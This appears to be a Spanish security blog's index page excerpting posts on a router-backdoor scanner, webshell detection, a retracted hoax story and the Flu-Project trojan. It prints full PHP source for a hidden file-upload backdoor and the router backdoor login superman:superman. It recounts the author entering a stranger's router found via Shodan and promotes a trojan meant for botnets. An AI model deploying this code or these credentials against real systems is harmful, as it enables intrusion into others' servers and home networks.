¿Ya revisaste si tu router tiene puertas traseras?
sep10

¿Ya revisaste si tu router tiene puertas traseras?

Hace unos días circulaba la noticia del descubrimiento por parte de los amigos de WebSec (@_hkm, @calderpwn y @LightOS) de una gran cantidad de routers en México con puertas traseras y cuentas ocultas que permiten a cualquier persona acceder con un usuario privilegiado a la configuración de los routers hogareños de miles de Mexicanos. El registro todavia es obligatorio y no esta disponible al publico pero pude acceder como betatester y como soy usuario de RouterPWN, Mac2WepKey, HHG5XX e y se la calidad de las herramientas publicadas por estos “gueyes” me puse en la tarea de probar la herramienta y quede sorprendido con su facilidad y rapidez. La herramienta esta desarrollada en Java para permitir su ejecución en cualquier sistema operativo (yo lo probé en Mac OS X), y al iniciar nos hace varias preguntas , como el tipo de vulnerabilidades a buscar y el rango de IPs que quieres auditar. Después de esto solo le das escanear y te ira mostrando si tu ip o el rango de ips que ingresaste es vulnerable a cualquiera de los fallos seleccionados. Lo primero que hice fue probar con mi propio router y con mi rango de ips, pero al parecer mi proveedor no incluye ni el router con el fallo ni las cuentas “de soporte técnico” backdoors, entonces con la ayuda de Shodan busqué algunos routers Mexicanos (solo para probar la efectividad de la herramienta) y el resultado fue muy diferente a los arrojados con rangos de IP-s Colombianos… En el rango escaneado encontré 50 equipos que tenían por lo menos una de las vulnerabilidades seleccionadas inicialmente, lo que demuestra la cantidad de familias que pueden resultar afectadas por este tipo de fallos. Pero la herramienta no se queda solo ahí, si le damos en “Ver Detalles”, nos genera un reporte en HTML con todos los detalles de los fallos encontrados en las diferentes IP’s de los rangos establecidos en el escaneo. Con esta información elegí una IP al azar e ingresé con las credenciales superman:superman que permite acceder a TODAS las configuraciones del router, permitiendo ver los equipos conectados, hacer redirección de puertos a equipos internos o incluso cambiar los DNS por algún servidor que podamos modificar a nuestro antojo. El usuario superman no solo tiene acceso a todas las configuraciones del router, sino que para sorpresa de muchos tiene más permisos que el mismo grupo Administrador del proveedor de servicio. Ahora solo queda que busques si tu router tiene backdoors con la herramienta de websec para buscar puertas traseras. ¿que puedo hacer si mi router tiene un backdoor? Si tiene la cuenta superman sigue estas instrucciones y podrás cambiarla. Si tienes el backdoor...

Leer Más
Detectando Webshells o Backdoors en Servidores Web
jun02

Detectando Webshells o Backdoors en Servidores Web

Es muy común ya ver cientos de páginas web “Defaceadas” o “hackeadas” una y otra vez, en ocasiones vemos que los grupos que se dedican a esta labor de hacer de una u otra manera “Hacktivismo” o ya sea sólo por demostrar sus conocimientos, repiten targets recalcando la mala seguridad que implementan en dichos targets (objetivos-páginas web) pues esto se debe a que una vez que es vulnerado un servidor web como tal, se plantan las famosas BACKDOORS o PUERTAS TRACERAS – no es suficiente con activar el Back Up (copia de seguridad) que muy seguramente tenemos para en un caso de emergencia restablecer el funcionamiento como tal del aplicativo. La función de un Backdoor o puerta trasera, consiste en dejar un “hueco” por donde un atacante pueda volver a tomar control del servidor o página web sin problema alguno, a continuación les explicaré una de las Backdoors mas fáciles de implementar en PHP. Esta Backdoor es simplemente un UPLOADER creado en PHP pero está oculto dentro de un archivo del sitio afectado, para este ejemplo usaremos www.wordpress.com (no se emocionen esto es en un entorno controlado LOCALMENTE xD ) CÓDIGO : <?php if (isset($_GET['backdoor'])) { echo '<center> <form action="" method="post" enctype="multipart/form-data"> Seleccione el Archivo <input value="Examinar" name="archivo" type="file"> <input value="0xSubir" type="submit"></form></center>'; if (isset($_FILES['archivo'])) { $ar=$_FILES['archivo']['name']; if (copy($_FILES['archivo']['tmp_name'],$path . $_FILES['archivo']['name'])) { echo '<center><h3>Archivo Subido en <a href="'.$ar.'">'.$ar.'</a></h3></center>'; } elseif (move_uploaded_file($_FILES['archivo']['tmp_name'],$path . $_FILES['archivo']['name'])){ echo '<center><h3>Archivo Subido en <a href="'.$ar.'">'.$ar.'</a></h3></center>'; } else { echo '<center><h3>Error al Subir Archivo</h3></center>'; } } } ?> Paso a explicar como funciona esta Backdoor. Como podemos observar en if (isset($_GET['backdoor'])) { nos esta diciendo que si el valor enviado por GET es backdoor, entonces nos va a mostrar nuestro UPLOADER, obviamente esta programado sin ningún tipo de filtros. Para una mayor comprensión veamos el ejemplo en el entorno controlado: Usaré en esta oportunidad el CMS ya conocido como WordPress .. se puede observar el sitio en normal funcionamiento, vemos que hay un post de una entrevista a Chema Alonso la cual se publico en el blog de la comunidad r00tc0d3rs para los que quieran leerla Aquí el Link (http://r00tc0d3rs.org/pequena-entrevista-a-chema-alonso-el-maligno/). lastimosamente corrimos con tan mala suerte que hemos sido vulnerados por un atacante el cual ha logrado montar una SHELL WEB con tan mala suerte que ni cuenta nos dimos de cuando sucedió esto ya que el atacante en esta ocasión no hizo un DEFACEMENT solo vulnero y tiene control de nuestro sitio, para evitar ser descubierto decidió borrar la SHELL que había montado pero no sin antes plantar su Backdoor. Aquí podemos observar la backdoor plantada en el archivo index.php Aquí logramos observar la manera de...

Leer Más

Cuidado con las copias chinas de productos Apple

FE DE ERRATA: La información contenida en esta noticia realmente se trataba del proyecto final del Master de Seguridad Informática de la Universidad Europea de Madrid, con el que varios estudiantes  pretendían correr un rumor falso en internet y colarlos en varios sitios conocidos. Como podrán ver lograron su comentido, realmente la noticia fué muy bien elaborada y bastante creíble, se supieron armar de una buena trama (bastante posible por cierto) y caímos bien a fondo en el afán de informar para evitar que otras personas resultaran victimas de este “robo de información”. En todo caso me alegra que de alguna forma ayudara a graduarse de Master a estos personajes y que la difusión de la falsa noticia concientizara un poco a los poseedores de dispositivos con Android sobre la seguridad de su sistema, por eso paso a dejar la noticia como estaba, pero poniendo en primer lugar las recomendaciones de seguridad para dispositivos Android, por que aunque esta noticia en particular fuera falsa, la amenaza de troyanos y malware en esta plataforma si que es real así que debemos protegernos de ella. Recomendaciones de seguridad para tu dispositivo con Android 1). Instale un buen antivirus en su dispositivo Android, algunas alternativas son: AntiVirus Free Super Security Phone Spam Blocker USA Lookout Mobile Security Anti-Virus Laser 2). Utilice una buena contraseña 3). Navegue con cuidado, con las mismas precauciones que lo haría si estuviera en un PC 4). NO instale aplicaciones innecesarias en su smartphone y siempre hágalo de repositorios de confianza 5). Realice periódicamente una copia de seguridad de toda la información que tenga en el dispositivo 6). NO guarde su contraseña dentro de los programas del teléfono (es cómodo pero peligroso) 7). NO abra mensajes de spam 8). Mantenga al día las aplicaciones instaladas y el sistema operativo   Los chinos copian cualquier cosa y algunas veces lo hacen realmente bien, tanto que muchos sentimos temor a la hora de encargarle a un familiar la compra de un producto Apple, por que muy a menudo en vez de comprar el iPad compraran el ePad; Pero ahora ademas de este temor debemos preocuparnos de otra cosa mas importante…. nuestra información. Me ha llegado un correo de Luis Argente Castro un ingeniero que aunque le apasionan los productos de la manzana, le parecen bastante costosos y escribe en su blog “Me pone un Mac? De los baratos si puede ser…” reviews de las alternativas chinas a estos productos, como era de esperarse Castro en vez de comprar la famosa tableta de Apple el iPad, decidió comprar una de sus copias chinas llamada ePad. El ePad es una tableta electrónica...

Leer Más

Flu-Project, troyano Open Source educativo

Hola Dragonautas!, les escribe Seifreed y empezare a colaborar con algunos aportes en la comunidad, espero que sean de su agrado.. Internet nos brinda la oportunidad de participar en muchos proyectos. Yo vengo a presentaros Flu-Project, un proyecto de creación en comunidad de un troyano Open Source. El proyecto es llevado a cabo por Juan Antonio Calles y Pablo González Flu es un troyano reverso que contiene funcionalidades como: XML Reader Process Register Keylogguer Console NAvigation Check Version ¿Como podemos participar en Flu-Project? Pues es tan fácil como registrarse en la web y bajarte el código fuente, y cuando aportes una al proyecto comunicarla a la comunidad con tal de poder seguir mejorando la herramienta. ¿Cual es el objetivo de Flu? El proyecto consiste en el desarrollo de una aplicación para el control remoto de máquinas Windows a través del troyano Flu, orientado a la generación de botnets a través de la tecnología HaaS (Haking as a Service) ¿Bajo que licencia se desarrolla Flu-Project? Flu Project, es un proyecto Open Source, el cual tiene licenciamiento GPL Mas Información: Pagina Oficial del...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES